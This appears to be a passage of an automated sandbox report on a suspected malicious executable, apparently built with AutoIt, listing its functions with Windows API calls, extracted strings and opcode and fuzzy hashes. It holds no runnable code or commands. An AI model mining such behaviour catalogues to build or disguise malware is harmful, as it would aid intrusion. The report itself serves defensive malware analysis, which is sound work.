                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            APIs
                                                            • _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                            • _sprintf.LIBCMT ref: 0040F9AE
                                                            Strings
                                                            Similarity
                                                            • API ID: _memmove$_sprintf_strlen
                                                            • String ID: %02X
                                                            • API String ID: 1921645428-436463671
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                            Strings
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                            Strings
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: htonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 3832099526-2422070025
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                            Strings
                                                            Similarity
                                                            • API ID: InternetOpen
                                                            • String ID: <local>
                                                            • API String ID: 2038078732-4266983199
                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: u,D
                                                            • API String ID: 4104443479-3858472334
                                                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                            APIs
                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • wsprintfW.USER32 ref: 0045612A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_mallocwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1262938277-328681919
                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                            APIs
                                                            • InternetCloseHandle.WININET(?), ref: 00442663
                                                            • InternetCloseHandle.WININET ref: 00442668
                                                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleInternet$ObjectSingleWait
                                                            • String ID: aeB
                                                            • API String ID: 857135153-906807131
                                                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                            • PostMessageW.USER32(00000000), ref: 00441C05
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D